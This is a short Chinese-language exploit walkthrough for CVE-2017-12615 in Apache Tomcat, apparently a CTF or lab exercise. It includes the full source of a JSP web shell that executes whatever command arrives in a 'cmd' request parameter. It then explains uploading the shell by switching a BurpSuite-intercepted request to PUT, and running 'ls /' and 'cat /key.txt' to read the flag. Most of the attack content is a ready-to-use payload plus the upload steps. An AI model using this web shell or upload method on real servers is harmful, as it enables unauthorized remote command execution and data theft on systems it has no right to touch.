漏洞编号:CVE-2017-12615
影响范围:Apache Tomcat 7.0.0 – 7.0.81
漏洞概述:当 Tomcat运行在Windows操作系统时,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。
Jsp恶意代码:
<%
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
%>
BurpSuite拦截修改数据包,上传jsp恶意代码:
将首行提交方式修改为PUT方式提交,数据包最后写入恶意代码,提交后服务器返回状态码201即上传成功

现在可以执行命令了,执行ls /

执行cat /key.txt,获得key

网友评论